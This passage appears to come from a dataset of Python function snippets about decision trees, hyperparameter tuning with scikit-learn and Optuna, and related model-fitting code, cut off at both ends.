depth at the next split is greater than a maximum specified depth\n if (maxDepth == 0 or maxDepth) and (newDepth > maxDepth): \n return decisionNode(results=__uniqueCounts(rows)) #If so, stop splitting.\n current_score=scoref(rows) #Calculate the current value of the score function.\n # Set up some variables to track the best criteria\n best_gain=0.0 #Initialize a value for the best gain from all possible splits\n best_criteria=None #Initialize a variable for the best column to split on\n best_sets=None #Initialize a variable for the best split's true and false data.\n\n #Count the number of columns in the row, minus the results column \n column_count=len(rows[0])-1\n for col in range(0,column_count): #Iterate over all the columns of the data\n #Generate the list of different values in this column\n column_values={} #Initialize a dictionary to store the column values\n for row in rows: \n #Iterate over each row, adding a key in the dict for each observed value\n column_values[row[col]]=1\n # Divide the dataset on each value in this column.\n for value in column_values.keys( ):\n (set1,set2)=__divideset(rows,col,value)\n #Calculate the fraction of data in the true branch\n p=float(len(set1))/len(rows) \n #Calculate the gain on the chosen score function using this split.\n gain=current_score-p*scoref(set1)-(1-p)*scoref(set2) \n #Check if this split provides a better gain than the best previous split\n if gain>best_gain and len(set1)>0 and len(set2)>0:\n best_gain=gain\n best_criteria=(col,value)\n best_sets=(set1,set2)\n # Recursively create the subbranches\n if best_gain>0:\n trueBranch=buildTree(best_sets[0], maxDepth = maxDepth, depth = newDepth)\n falseBranch=buildTree(best_sets[1], maxDepth = maxDepth, depth = newDepth)\n return decisionNode(col=best_criteria[0],value=best_criteria[1],\n tb=trueBranch,fb=falseBranch)\n else:\n return decisionNode(results=__uniqueCounts(rows))", "def rand_optimize(self, X, y, n_iter=12, scoring='accuracy', cv=10, n_jobs=1, \n sample_params=False, min_params=2, get_params=False, random_state=None): \n get_key = (lambda name, i: name if i<2 else name+str(i-1))\n \n def search(clf, params): \n \n if not params:\n print(clf.name, 'No params')\n return (clf.estimator.fit(X, y), None)\n \n pars = params.copy() \n kwargs = {}\n if sample_params and (not get_params):\n kwargs = {'num_params': \n np.random.randint(min_params, len(pars)), \n 'mode': 'random'} \n elif get_params and (not sample_params) and clf.cv_params_to_tune:\n kwargs = {'keys': clf.cv_params_to_tune, \n 'mode': 'select'} \n \n pars = clf.set_tune_params(pars, **kwargs) if kwargs else pars \n niter = min(n_iter, clf.max_n_iter) \n \n randsearch = RandomizedSearchCV(clf.estimator, pars, \n n_iter=niter, scoring=scoring, cv=cv, \n n_jobs=n_jobs, random_state=random_state) \n fitted = False\n start = time.time()\n try:\n randsearch.fit(X, y)\n fitted = True\n except:\n print(clf.name, 'failed fit')\n print('error:', sys.exc_info()[1])\n return (clf.estimator.fit(X, y), None)\n else:\n print(clf.name, 'success')\n return (randsearch, randsearch.best_score_)\n \n finally:\n if self.verbose > 0 and fitted:\n delta = (time.time()-start)/60.0\n print(\"==== {} ==== \\n>>> Search time: {:.1f} (min) \\n>>> Best score: {:.4f}\"\n .format(clf.name, delta, randsearch.best_score_), end='\\n\\n') \n \n return {get_key(name, idx): search(clf, params) \n for name, clf in self.clf.items() for idx, params \n in enumerate(clf.cv_params, start=1)}", "def hyper_parameter_tuning(X, y, classifier, models, sntypes_map, feature_names, fig_dir='.', remove_models=(), name=''):\n\n # Hyperparameter grid\n n_estimators = [int(x) for x in np.linspace(start=200, stop=2000, num=10)]\n max_features = ['auto', 'sqrt']\n max_depth = [int(x) for x in np.linspace(10, 110, num=11)]\n max_depth.append(None)\n min_samples_split = [2, 5, 10]\n min_samples_leaf = [1, 2, 4]\n bootstrap = [True, False]\n random_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n\n # Get data\n num_features = X.shape[1]\n model_names = [sntypes_map[model] for model in models]\n X, y, models, remove_models = remove_redundant_classes(X, y, models, remove_models)\n\n # Get best features\n n = 50\n num_features, feature_names, X = get_n_best_features(n, X, y, classifier, feature_names, num_features, fig_dir, name, models, model_names)\n\n # Randomised Search\n clf_random = RandomizedSearchCV(estimator=classifier, param_distributions=random_grid, n_iter=7, cv=3, verbose=2,\n random_state=42, n_jobs=2)\n clf_random.fit(X, y)\n print(clf_random.best_params_)\n\n def evaluate(model, test_features, test_labels):\n predictions = model.predict(test_features)\n errors = abs(predictions - test_labels)\n mape = 100 * np.mean(errors / test_labels)\n accuracy = 100 - mape\n print('Model Performance')\n print('Average Error: {:0.4f} degrees.'.format(np.mean(errors)))\n print('Accuracy = {:0.2f}%.'.format(accuracy))\n\n return accuracy\n\n best_random = clf_random.best_estimator_\n # random_accuracy = evaluate(best_random, test_features, test_labels)", "def fit_model(X, y,metric, model):\n cv_sets = ShuffleSplit(n_splits=10, test_size= 0.2, train_size= 0.8, random_state=42)\n \n\n if model == 'regression_tree':\n\n clf = DecisionTreeRegressor(random_state=42)\n\n # Creating a dictionary for the parameter 'max_depth' with a range from 1 to 10\n param = {\n 'max_depth': [1,2,3,4,5,6,7,8,9,10]\n }\n\n\n elif model == 'ridge':\n clf = Ridge(random_state=42, fit_intercept=False)\n param = {\n 'alpha': [0, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100, 1000]\n }\n\n\n if metric == 'r2':\n scoring_fnc = make_scorer(r_squared,greater_is_better=True)\n\n elif metric == 'rss':\n scoring_fnc = make_scorer(rss, greater_is_better=False)\n\n # Creating the grid search cv object --> GridSearchCV()\n grid = GridSearchCV(estimator=clf, param_grid=param, cv=cv_sets,scoring= scoring_fnc)\n\n # Fit the grid search object to the data to compute the optimal model\n grid = grid.fit(X, y)\n\n # Return the optimal model after fitting the data\n return grid.best_estimator_", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"rAfb[1.0,-5.0, 5.0]\");\n self.modelBuilder.doVar(\"rA0[1.0, -5.0, 5.0]\");\n self.modelBuilder.doSet(\"POI\",\"rAfb,rA0\")\n self.modelBuilder.factory_('expr::mAfb(\"@0*@1\",eAfb,rAfb)')\n self.modelBuilder.factory_('expr::mA0(\"(@0*@1)\",eA0,rA0)')\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def _search(self, node: Node, search_depth: int = 1) -> (float, list):\n if not node.children or search_depth == 0:\n return node.tot_reward / node.num_samples, []\n elif search_depth == 1:\n max_val = -math.inf\n max_actions = []\n for action, child in node.children.items():\n node_val = child.tot_reward / child.num_samples\n if node_val > max_val:\n max_val = node_val\n max_actions = [action]\n elif node_val == max_val:\n max_actions.append(action)\n max_action = random.choice(max_actions)\n child = node.children[max_action]\n return child.tot_reward / child.num_samples, [max_action]\n best_reward = -math.inf\n best_act_seq = []\n for action, child in node.children.items():\n child_reward, child_act_seq = self._search(child, search_depth - 1)\n if child_reward > best_reward:\n best_act_seq = [action] + child_act_seq\n best_reward = child_reward\n return best_reward, best_act_seq", "def DecisionTreeAlgorithm(df, mltask, counter = 0, min_samples = 2, max_depth = 5, random_subspace = None):\n\n if counter == 0:\n global COLUMN_HEADERS, FEATURE_TYPE\n COLUMN_HEADERS = df.columns\n FEATURE_TYPE = hf.determine_type_of_feature(df)\n data = df.values\n else:\n data = df\n \n if (check_purity(data)) or (len(data) < min_samples) or (counter == max_depth):\n leaf = create_leaf(data, mltask)\n return leaf\n \n else:\n counter += 1\n \n potential_splits = get_potential_split(data, random_subspace)\n split_column,split_value = determine_best_split(data, potential_splits, mltask)\n data_below,data_above = split_data(data,split_column,split_value)\n \n if (len(data_below) == 0) or (len(data_above) == 0):\n leaf = create_leaf(data, mltask)\n return leaf\n \n feature_name = COLUMN_HEADERS[split_column]\n type_of_feature = FEATURE_TYPE[split_column]\n if type_of_feature == 'continuous':\n question = '{} <= {}'.format(feature_name,split_value)\n else:\n question = '{} = {}'.format(feature_name,split_value)\n sub_tree = {question:[]}\n \n yes_answer = DecisionTreeAlgorithm(data_below, mltask, counter, min_samples, max_depth, random_subspace)\n no_answer = DecisionTreeAlgorithm(data_above, mltask, counter, min_samples, max_depth, random_subspace)\n \n if yes_answer == no_answer :\n sub_tree = yes_answer\n else :\n sub_tree[question].append(yes_answer)\n sub_tree[question].append(no_answer)\n \n return sub_tree", "def decision_tree(self, min_impurity_splits = None, is_voice_data = True):\n title = \"Learning Curves (Decision Tree - voice dataset)\"\n if not is_voice_data:\n title = \"Learning Curves (Decision Tree - EEG dataset)\"\n estimators = []\n for min_impurity_split in min_impurity_splits:\n estimator = tree.DecisionTreeClassifier(criterion=\"entropy\", \\\n min_impurity_split = min_impurity_split)\n estimators.append(estimator)\n\n # set colors: r -red, g- green, b - blue, m - magenta\n colors = [(\"r\", \"g\"), (\"b\", \"m\")] \n labels = [(\"Training accuracy (unpruned tree)\", \n \"Cross-validation accuracy (unpruned tree)\"),\n (\"Training accuracy (pruned tree)\", \n \"Cross-validation accuracy (pruned tree)\")]\n \n # Cross validation with 100 iterations to get smoother mean test and train\n # score curves, each time with 30% data randomly selected as a validation set.\n cv = cross_validation.ShuffleSplit(self.X.shape[0], n_iter=100,\n test_size=0.3, random_state=42)\n self.plot_learning_curve(estimators, title, labels, colors, self.X, self.y, \\\n cv=cv, n_jobs=4)\n \n # plot validation curve\n estimator_val = tree.DecisionTreeClassifier (criterion=\"entropy\") \n param_name = \"min_impurity_split\"\n x_label = \"Number of nodes in decision tree\"\n val_title = \"Validation Curve with Decision Tree (voice dataset)\"\n params =[i/100.0 for i in range(1,50)]\n if not is_voice_data:\n val_title = \"Validation Curve with Decision Tree (EEG dataset)\"\n params = np.logspace(-0.25, 0, 50)\n number_of_nodes = []\n for param in params:\n clf = tree.DecisionTreeClassifier(criterion=\"entropy\", min_impurity_split = param)\n clf.fit(self.X, self.y)\n number_of_nodes.append(clf.tree_.node_count)\n print number_of_nodes\n self.plot_validation_curve(estimator_val, params, param_name, self.X, \n self.y, val_title, xtricks = number_of_nodes, x_label = x_label,\n cv=cv, n_jobs = 4)\n plt.show()", "def select(self):\n\t\twarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\t\tscore_best = float(\"inf\")\n\t\tbest_model = None\n\t\tfor numStates in range(self.min_n_components, self.max_n_components + 1):\n\t\t\ttry:\n\t\t\t\tmodel = self.base_model(numStates)\n\t\t\t\tlog_l = model.score(self.X, self.lengths)\n\t\t\t\tp = numStates\n\t\t\t\tlog_n = np.log(len(self.lengths))\n\t\t\t\tscore = -2 * log_l + p * log_n\n\t\t\t\tif score < score_best:\n\t\t\t\t\tscore_best = score\n\t\t\t\t\tbest_model = model\n\t\t\texcept Exception as e:\n\t\t\t\tpass\n\n\t\twhile best_model is None:\n\t\t\tbest_model = self.base_model(np.random.randint(self.min_n_components, self.max_n_components + 1))\n\n\t\treturn best_model", "def optimize(self, trial):\r\n num_leaves = trial.suggest_int(\"num_leaves\", 6, 50)\r\n min_child_samples = trial.suggest_int(\"min_child_samples\", 100, 500)\r\n min_child_weight = trial.suggest_uniform(\"min_child_weight\", 1, 7)\r\n subsample = trial.suggest_uniform(\"subsample\", 0.6, 1)\r\n colsample_bytree = trial.suggest_uniform(\"colsample_bytree\", 0.6, 1)\r\n reg_alpha = trial.suggest_uniform(\"reg_alpha\", 0.1, 100)\r\n reg_lambda = trial.suggest_uniform(\"reg_lambda\", 0.1, 100)\r\n\r\n model = LGBMRegressor(\r\n num_leaves=num_leaves,\r\n min_child_samples=min_child_samples,\r\n min_child_weight=min_child_weight,\r\n subsample=subsample,\r\n colsample_bytree=colsample_bytree,\r\n reg_alpha=reg_alpha,\r\n reg_lambda=reg_lambda,\r\n )\r\n\r\n model = ModelTrainer(file_object=self.file_object).get_trained_model(\r\n model, self.X_train, self.y_train\r\n )\r\n r_squared, rmse = ModelScorer(file_object=self.file_object).get_model_scores(\r\n model, self.X_test, self.y_test\r\n )\r\n\r\n return r_squared", "def get_winners(self):\n\n if self.optimal is not None:\n return self.optimal\n clean_proposals = self.cleaner.create_scenarios(self.proposals)\n self.optimal = self.optimizer.optimize(clean_proposals)\n return self.optimal", "def para_search(dname):\n if sys.platform != 'win32':\n grid_py = './PromoterSVM/libsvm/tools/grid.py'\n # gnuplot_exe = '/usr/bin/gnuplot'\n # svmtrain_exe = '../my-svm-train'\n else:\n grid_py = r'D:\\LiYuan\\\"Bioinformatic Research\"\\IMU\\zuo\\Tasks\\\"20160206-Promoter SVM\"\\biopromoter_script\\PromoterSVM\\libsvm\\tools\\grid.py'\n # gnuplot_exe = r\"D:\\Program Files\\gnuplot\\bin\\gnuplot.exe\"\n # svmtrain_exe = r'D:\\LiYuan\\\"Bioinformatic Research\"\\IMU\\zuo\\Tasks\\\"20160206-Promoter SVM\"\\biopromoter_script\\PromoterSVM\\libsvm\\windows\\my-svm-train.exe'\n\n ###################################\n # grid.py: find the best parameter(c,g), and generates a model file\n ###################################\n # cg_results = []\n cmd = \"{0} {1}\".format(grid_py, dname)\n print \"Cross Validating...\"\n grid_out = Popen(cmd, shell=True, stdout=PIPE).stdout\n\n print cmd\n print grid_out.readline()\n\n line = \"\"\n while True:\n last_line = line\n line = grid_out.readline()\n if not line:\n break\n c, g, cvrate = map(float, last_line.split())\n # cg_results.append('Best c={0}, g={1} CV rate={2}'.format(c,g,rate))\n\n print('Best c={0}, g={1} CV rate={2}'.format(c, g, cvrate))\n\n return c, g, cvrate", "def hyperparameter_optimization_random(X, y, *argv):\n\n clf_best_params = {}\n\n # Iterate over all (classifier, hyperparameters) pairs\n for clf, params in argv:\n\n # Run randomized search\n n_iter_search = 10\n random_search = RandomizedSearchCV(\n clf, param_distributions=params, n_iter=n_iter_search, cv=10, iid=False\n )\n random_search.fit(X, y)\n\n # Save results\n clf_best_params[clf] = random_search.best_params_\n\n return clf_best_params", "def fit(self, dataSet, prune=False, validSet=None):\n\t\t\n\t\tmodel_args = self._model_complexity_args.copy()\n\t\tif prune:\n\t\t\tif type(validSet).__name__ != 'ndarray':\n\t\t\t\traise AttributeError(\"To make pruning, validation set accept 'ndarray'\\\n\t\t\t\t\t, cannot be {}!\".format(type(validSet).__name__))\n\t\t\t# get a fully-grown tree\n\t\t\tmodel_args['min_impurity_decrease'] = 0\n\t\t\tmodel_args['min_samples_split'] = 2\n\t\t\n\t\tif self._treeType == 'reg':\n\t\t\timpurity_crit = DecisionTree._MSE\n\t\telif self._treeType == 'clf':\n\t\t\timpurity_crit = DecisionTree._Gini\n\n\n\t\telse:\n\t\t\traise ValueError(\"Argument 'treeType' accept 'clf' or 'reg' only\")\n\t\tself._root = DecisionTree._createTree(dataSet, impurity_crit=impurity_crit,\n\t\t\t\t\t\t\t\t\t\t\t**model_args)\n\n\t\tprint(\"Decision Tree Generated!\")\n\n\t\tif prune:\n\t\t\tprint(\"Pruning...\")\n\t\t\ttreeSeq = {'tree':[self._root], 'alpha':[0], 'num_leaves': [self._root.leaves()]} \n\t\t\tpruned_tree = DecisionTree._prune(deepcopy(self._root), impurity_crit, dataSet, treeSeq)\n\t\t\tprint('Pruning Done: %d pruned sub tree got' % len(treeSeq['tree']))\n\t\t\tprint('choosing best subtree through validation set...')\n\t\t\tbestSubtree, error_score = DecisionTree._bestSubtree(treeSeq, impurity_crit, validSet)\n\t\t\tprint('best subtree selected with error score: {}'.format(error_score))\n\n\t\t\tself._root = bestSubtree", "def get_parameter_estimation_parameters(self, friendly=True):\n #Get the sensitivities task:\n fitTask=self._getTask('parameterFitting')\n fitProblem = fitTask.find(xmlns + 'Problem')\n optimizationItems = fitProblem.find(xmlns + 'ParameterGroup')\n parameters = []\n for subGroup in optimizationItems:\n name = None\n lowerBound = None\n upperBound = None\n startValue = None\n \n for item in subGroup:\n if item.attrib['name'] == 'ObjectCN':\n name = item.attrib['value']\n elif item.attrib['name'] == 'UpperBound':\n upperBound = item.attrib['value']\n elif item.attrib['name'] == 'LowerBound':\n lowerBound = item.attrib['value']\n elif item.attrib['name'] == 'StartValue':\n startValue = item.attrib['value']\n assert name !=None\n assert lowerBound != None\n assert upperBound != None\n assert startValue != None\n \n if friendly:\n #Construct a user-friendly name for the parameter name using regexs\n #Look for a match for global parameters: Vector=Values[Test parameter],\n global_string = r'.*Vector=Values\\[(?P<name>.*)\\].*'\n global_string_re = re.compile(global_string)\n global_match = re.match(global_string_re, name)\n \n if global_match:\n name = global_match.group('name')\n \n #else check for a local match.\n #Vector=Reactions[Reaction] Parameter=k1\n local_string = r'.*Vector=Reactions\\[(?P<reaction>.*)\\].*Parameter=(?P<parameter>.*),Reference=Value.*'\n local_string_re = re.compile(local_string)\n local_match = re.match(local_string_re, name)\n \n if local_match:\n reaction = local_match.group('reaction')\n parameter = local_match.group('parameter')\n name = '(%s).%s'%(reaction, parameter)\n\n parameters.append((name, lowerBound, upperBound, startValue))\n\n return parameters", "def __init__(self,\r\n max_depth=None,\r\n min_samples_split=2,\r\n min_samples_leaf=1,\r\n split_criterion=None,\r\n feature_selection=None,\r\n feature_prob=None,\r\n min_gain_split=0,\r\n split_chooser=None):\r\n self._n_classes = None\r\n self._max_depth = None\r\n self._split_criterion = None\r\n self._split_chooser = None\r\n self._feature_selection = None\r\n self._min_samples_split = None\r\n self._min_samples_leaf = None\r\n self._min_gain_split = None\r\n self._feature_prob = None\r\n\r\n if max_depth is None or max_depth > 0:\r\n self._max_depth = max_depth\r\n else:\r\n raise(ValueError(\"The depth of the tree must be greater than 0.\"))\r\n\r\n if split_criterion is not None:\r\n self._split_criterion = split_criterion\r\n else:\r\n raise (ValueError(\"The split criterion can not be None.\"))\r\n\r\n if split_chooser is not None:\r\n self._split_chooser = split_chooser\r\n else:\r\n raise (ValueError(\"The split chooser can not be None.\"))\r\n\r\n if feature_selection is not None:\r\n self._feature_selection = feature_selection\r\n else:\r\n raise (ValueError(\"The feature selection can not be None.\"))\r\n\r\n if min_samples_split is not None and min_samples_split > 1:\r\n self._min_samples_split = min_samples_split\r\n else:\r\n raise(ValueError(\"The min_samples_split must be greater than 1.\"))\r\n\r\n if min_samples_leaf is not None and min_samples_leaf > 0:\r\n self._min_samples_leaf = min_samples_leaf\r\n else:\r\n raise(ValueError(\"The min_samples_leaf must be greater than 0.\"))\r\n\r\n if min_gain_split is not None and min_gain_split >= 0:\r\n self._min_gain_split = min_gain_split\r\n else:\r\n raise(ValueError(\"The min_gain_split must be greater or equal than 0.\"))\r\n\r\n if feature_prob is not None:\r\n self._feature_prob = feature_prob", "def test_best_val(self, te_acc):\n self.test_val = te_acc", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"dAfb[0.,-0.75,0.75]\");\n self.modelBuilder.doVar(\"dA0[0.0, -1.0, 1.0]\");\n #self.modelBuilder.doSet(\"POI\",\"dAfb,dA0\")\n self.modelBuilder.doSet(\"POI\",\"dAfb\")\n self.modelBuilder.factory_('expr::mAfb(\"@0+@1\",eAfb,dAfb)')\n self.modelBuilder.factory_('expr::mA0(\"(@0+@1)\",eA0,dA0)')\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def branching(self, df, layer, side):\n min_err = 1\n # Search for the best cut\n for i in range(self.dim):\n ddf = df.sort_values(i)\n Y = ddf.y.values\n\n for j in range(1, len(ddf)):\n err = self.impurity(Y, j)\n if err < min_err:\n best_d, best_val, min_err = i, ddf.iloc[j][i], err\n\n # Record the best branching parameters at this node\n self.Branch[(layer, side)] = best_d, best_val\n return best_d, best_val", "def kbest(X, y, select_method, pipeline):\n\n # Fitting the tuned pipeline to the whole dataset and extracting the\n # selected features\n pipe = pipeline.fit(X=X, y=y)\n if select_method is 'enet':\n coefs = (pipe\n .best_estimator_\n .named_steps['selector']\n .estimator_\n .coef_[pipe\n .best_estimator_\n .named_steps['selector']\n .get_support()])\n elif select_method is 'f-test':\n coefs = (pipe\n .best_estimator_\n .named_steps['selector']\n .scores_[pipe\n .named_steps['selector']\n .get_support()])\n else:\n raise ValueError(\"\"\"Must specify feature selection technique \n in select method\"\"\")\n \n # Getting feature names\n names = (X\n .columns\n .values[pipe\n .best_estimator_\n .named_steps['selector']\n .get_support()])\n names_scores = list(zip(names, coefs))\n kbest_df = (pd\n .DataFrame(data=names_scores,\n columns=['Features',\n 'Coefs'])\n .sort_values(by='Coefs',\n ascending=False))\n\n # Filtering out zeroed coefficients from the elastic net that were not\n # removed in SelectFromModel\n if select_method is 'enet':\n kbest_df = kbest_df.loc[(kbest_df['Coefs'] != 0.000000)\n | kbest_df['Coefs'] != -0.000000]\n else:\n pass\n\n # Getting the tuned parameters\n optimal_params = pipeline.best_params_\n params_df = pd.DataFrame.from_dict(data=optimal_params,\n orient='index',\n columns=['Parameters'])\n best_inner_cv_test_score = pipeline.best_score_\n\n return kbest_df, params_df, best_inner_cv_test_score", "def obtain_training_parameters(para, x, y, alg = 'LR'):\n \n \n global omega\n \n # Iterate to find the optimal parameters\n if alg == 'LR': # logistic regression\n omega = np.zeros((3, 1))\n alpha = para.step_size # step size\n for i in range(para.iteration):\n grad = np.zeros((3, 1))\n for i in range(len(x[:, 0])):\n grad += np.reshape(x[i, :], (3, 1)) * (-y[i] + 1 / (1 + np.exp(-np.dot(x[i, :], omega))))\n omega -= alpha * grad \n \n elif alg == 'GNB': # Gaussian Naive Bayes\n # get counts for each class\n itszero = 0\n itsone = 0\n for i in range(len(y)):\n if y[i] == 1:\n itsone += 1\n else:\n itszero += 1\n \n # probability of see y\n theta0 = itszero / len(y)\n theta1 = 1 - theta0\n \n # mean of omega\n mew00 = 0\n mew01 = 0\n mew02 = 0\n mew10 = 0\n mew11 = 0\n mew12 = 0\n for i in range(len(y)):\n if y[i] == 0:\n mew00 += x[i, 0] / itszero\n mew01 += x[i, 1] / itszero\n mew02 += x[i, 2] / itszero\n else:\n mew10 += x[i, 0] / itsone\n mew11 += x[i, 1] / itsone\n mew12 += x[i, 2] / itsone\n \n # variance of omega \n sigma00 = 0\n sigma01 = 0\n sigma02 = 0\n sigma10 = 0\n sigma11 = 0\n sigma12 = 0\n for i in range(len(y)):\n if y[i] == 0:\n sigma00 += (x[i, 0] - mew00)**2 / itszero\n sigma01 += (x[i, 1] - mew01)**2 / itszero\n sigma02 += (x[i, 2] - mew02)**2 / itszero\n else:\n sigma10 += (x[i, 0] - mew10)**2 / itsone\n sigma11 += (x[i, 1] - mew11)**2 / itsone\n sigma12 += (x[i, 2] - mew12)**2 / itsone\n \n # store these parameters into the name \"omage\"\n omega = [theta0, theta1, mew00, mew01, mew02, mew10, mew11, mew12,\n sigma00, sigma01, sigma02, sigma10, sigma11, sigma12] \n \n else: # Gaussian Mixture\n pass\n \n return omega", "def get_params(self, deep=True):\n return super(AveragingRegressor, self)._get_params('estimators', deep=deep)", "def fit(train_data, train_target):\r\n for name in models.keys():\r\n est = models[name]\r\n est_params = params2[name]\r\n gscv = GridSearchCV(estimator=est, param_grid=est_params, cv=5)\r\n gscv.fit(train_data, train_target)\r\n print(\"best parameters are: {}\".format(gscv.best_estimator_))\r\n print(\"Where we selected the parameters: {}\" .format(gscv.cv_results_['params'][gscv.best_index_]))\r\n print(\"with mean cross-validated score: {}\" .format(gscv.best_score_))", "def get_bestparameter(self):\n if self._df_test is None:\n raise RuntimeError('get_bestparameter: please the '\n 'train model first')\n mean = self._df_test.mean(axis=1)\n if len(mean) == 1:\n result = mean.idxmax()\n elif len(mean) == 2:\n result = mean.loc[mean.index > 1].idxmax()\n else:\n result = mean.loc[mean.index > 2].idxmax()\n return result", "def get_bestparameter(self):\n if self._df_test is None:\n raise RuntimeError('get_bestparameter: please the '\n 'train model first')\n mean = self._df_test.mean(axis=1)\n if len(mean) == 1:\n result = mean.idxmax()\n elif len(mean) == 2:\n result = mean.loc[mean.index > 1].idxmax()\n else:\n result = mean.loc[mean.index > 2].idxmax()\n return result", "def find_best_params(self, n_trials=120):\r\n self.logger_object.log(\r\n self.file_object,\r\n \"Entered find_best_params method of HyperparametersTuner class.\",\r\n )\r\n try:\r\n optimization_function = partial(self.optimize)\r\n study = optuna.create_study(direction=\"maximize\")\r\n study.optimize(optimization_function, n_trials=n_trials)\r\n self.logger_object.log(\r\n self.file_object, f\"Successfully ran {n_trials} optuna study trials.\"\r\n )\r\n\r\n self.tuned_hyperparams[\"LGBM Regression\"].append(study.best_params)\r\n self.logger_object.log(\r\n self.file_object,\r\n \"Successfully appended best model parameters as a dictionary.\",\r\n )\r\n\r\n with (open(str(Config.TUNED_HYPERPARAMS_FILE_PATH), \"w\")) as outfile:\r\n json.dump(self.tuned_hyperparams[\"LGBM Regression\"], outfile, indent=1)\r\n self.logger_object.log(\r\n self.file_object,\r\n \"Successfully dumped the best parameters in best_params.json .\",\r\n )\r\n except Exception as e:\r\n self.logger_object.log(\r\n self.file_object,\r\n f\"Exception occured in find_best_params method of HyperparametersTuner class. Exception message: {e}\",\r\n )\r\n self.logger_object.log(\r\n self.file_object,\r\n \"Dumping best parameters unsuccessful. Exited find_best_params method of HyperparametersTuner class\",\r\n )\r\n raise Exception()", "def set_optimal_parameters(self):\n # Getting the best trial based on the test errors\n idx = self.trial_losses.index(min(self.trial_losses))\n self.best_trial = self.trial_list[idx]\n self.objective.parse_trial(self.best_trial)", "def _find_svm_rbf_params(df, metrics, kernel):\n context = ramp.DataContext(data=df)\n config = ramp.Configuration(target=\"target\",\n features=[ramp.BaseFeature(x) for x in metrics])\n x, y = ramp.models.get_xy(config, context)\n\n if kernel == \"linear\":\n param_grid = dict(C=10.0 ** np.arange(-2, 5))\n else:\n param_grid = dict(gamma=10.0 ** np.arange(-5, 4),\n C=10.0 ** np.arange(-2, 9))\n grid = sklearn.grid_search.GridSearchCV(sklearn.svm.SVC(kernel=kernel),\n param_grid=param_grid,\n cv=sklearn.cross_validation.StratifiedKFold(y=y, k=3),\n verbose=True)\n grid.fit(x, y)\n print grid.best_estimator_\n out = {}\n for attr in param_grid.keys():\n out[attr] = getattr(grid.best_estimator_, attr)\n return out", "def random_parameters():\n res = dict()\n res[\"population_size\"] = random.randrange(2, 21)\n res[\"mutation_prob\"] = random.choice([0.02, 0.05, 0.10, 0.20, 0.30, 0.40, 0.50])\n res[\"crossover\"] = random.choice([True, False])\n res[\"selection\"] = random.choice([True, False])\n res[\"sigma\"] = random.choice([0.1, 0.25, 0.5, 1])\n res[\"crossover_method\"] = random.choice([\"single_swap\", \"uniform_swap\", \"arithmetic\"])\n res[\"selection_method\"] = random.choice([\"truncated\", \"fitness_based\", \"rank_based\"])\n res[\"best_rate\"] = random.choice([0.2, 0.3, 0.5])\n res[\"n_parents\"] = random.choice([2, 3, 4])\n res[\"elitism\"] = random.choice([True, False])\n return res", "def decision_function(self, X):\n ...", "def _choose_best_option(self):", "def main(args):\n if args.train_test_split < 0.2 or args.train_test_split > 0.8:\n print(\"Bad value for train_test_split, range is 0.2 - 0.8\")\n sys.exit()\n\n dataset = pd.read_csv(args.train_file)\n\n x_data = dataset.loc[:, (dataset.columns != args.classification_column) \\\n & (dataset.columns != \"Survey_id\")]\n y_data = dataset[args.classification_column].to_numpy()\n dataset_headers = list(x_data.columns)\n x_data = x_data.fillna(0).to_numpy()\n\n x_train, x_test, y_train, y_test = train_test_split(x_data, y_data, \\\n test_size=args.train_test_split)\n\n\n dtc = DecisionTreeClassifier(max_depth=args.max_depth, \\\n min_impurity_split=args.acceptable_impurity)\n dtc = dtc.fit(x_train, y_train)\n dtc_score = dtc.score(x_test, y_test)\n\n\n export_graphviz(dtc, out_file=\"decision_tree.dot\", feature_names=dataset_headers, \\\n rounded=True, precision=1, filled=True)\n os.system(\"dot -Tpng decision_tree.dot -o decision_tree.png\")\n\n\n rfc = RandomForestClassifier(n_estimators=args.estimators, max_depth=args.max_depth, \\\n min_impurity_split=args.acceptable_impurity)\n rfc.fit(x_train, y_train)\n rfc_score = rfc.score(x_test, y_test)\n\n file = open('result.txt', 'w')\n file.write(f'Decisions tree score = {dtc_score}\\n')\n file.write(f'Random forest score = {rfc_score}\\n')\n file.close()", "def finetune_depth():\n start_depth = 3\n tol = 